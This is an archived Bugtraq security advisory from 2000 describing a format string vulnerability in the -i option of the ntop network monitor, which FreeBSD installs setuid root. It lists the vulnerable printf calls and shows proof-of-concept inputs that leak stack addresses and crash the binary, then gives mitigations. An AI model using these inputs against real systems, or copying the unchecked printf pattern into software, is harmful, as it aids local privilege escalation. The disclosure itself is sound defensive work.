[17265] in bugtraq

home help back first fref pref prev next nref lref last post

Ksecurity Advisory: ntop format string vulnerability

daemon@ATHENA.MIT.EDU (Ksecurity)
Thu Oct 19 12:41:15 2000

Message-Id:  <20001018084524.2017.qmail@securityfocus.com>
Date:         Wed, 18 Oct 2000 08:45:24 -0000
Reply-To: Ksecurity <ksecurity@ILAND.CO.KR>
From: Ksecurity <ksecurity@ILAND.CO.KR>
To: BUGTRAQ@SECURITYFOCUS.COM


               Ksecurity Advisory
             (Korea security group)

            Subject:     ntop format string vulnerability
  Release Date:     10/17/2000
              Author:     AirPlane (ksecurity@iland.co.kr)
         Platforms:     *nix
      test version:     ntop 1.1.pre3 , ntop 1.2.a10


I.Background
ntop is a popular utility for monitoring and 
summarizing network usage for unix systems.

II.Summary
ntop 1.1.pre3 and 1.2.a10 are vulnerabled to format 
string attack in there -i option.

OpenBSD,FreeBSD,NetBSD include ntop 1.1.pre3 in 
there port packages but they aren't default install.

In FreeBSD case, By default the ntop port is installed 
setuid root and only executable by root and members 
of the 'wheel' group.


III.Detailed Description

ntop.c/ntop 1.1.pre3
395:      printf(ebuf);
429:      printf(ebuf);
434:      printf(ebuf);

ntop.c/ntop 1.2.a10
633:      printf(ebuf);
705:      printf(ebuf);
712:      printf(ebuf);
725:      printf(ebuf);

There are standard format string bug,
ebuf variable used device error message.

khs% uname -a
FreeBSD khs.AirPlane 4.0-RELEASE FreeBSD 4.0-
RELEASE

khs% ls -al /usr/local/sbin/ntop
-r-sr-s--- 1 root wheel 171978 Jul 25 
03:45 /usr/local/sbin/ntop

khs% id
uid=1002(user) gid=1002(user) groups=1002(user), 0
(wheel)

khs% /usr/local/sbin/ntop -i "%p %p %p %p %p"
ntop v.1.1 MT [i386-unknown-freebsd4.0]
listening on 0x80516ad 0x0 0xbf bff888 0x807d480
Host Act -Rcvd- Sent TCP UDP ICMP 0xbfbff970 
0xbfbff834
0x804a23d 0x3: Device not configured

khs% /usr/local/sbin/ntop -i "%s %s %s %s"
ntop v.1.1 MT [i386-unknown-freebsd4.0] listening on 
5T^h|^h{^hx
Segmentation fault(core dumped)


IV.Solution
1. chmod u-s path/to/ntop
2. FreeBSD users read FreeBSD-SA-00:36(ntop -w 
buffer overflow).
3. maybe ntop 1.3.2(snapshot) version doesn't format 
string bugs.


In OpenBSD land, the pain is quick, at least.
                                             -- Theo de Raadt ;)

Copyright 2000, Ksecurity Project Team
home help back first fref pref prev next nref lref last post